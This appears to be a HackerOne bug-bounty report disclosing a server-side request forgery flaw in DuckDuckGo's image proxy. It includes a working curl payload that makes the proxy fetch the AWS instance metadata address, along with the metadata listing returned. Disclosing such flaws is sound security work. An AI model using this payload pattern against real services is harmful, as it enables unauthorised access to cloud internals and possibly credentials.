DuckDuckGo: SSRF vulnerability on proxy.duckduckgo.com (access to metadata server on AWS)

2018-08-15T15:29:26
ID H1:395521
Type hackerone
Reporter cujanovic
Modified 2018-10-31T17:33:34

Description

Hello, I saw that SSRF on proxy.duckduckgo.com is out of scope but because of the severity I wanted to report this. The payload is simple: curl "https://proxy.duckduckgo.com/iur/?f=1&image_host=http://169.254.169.254/latest/meta-data/"

Response from the server: ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname instance-action instance-id instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/

Impact

access information on internal AWS metadata server.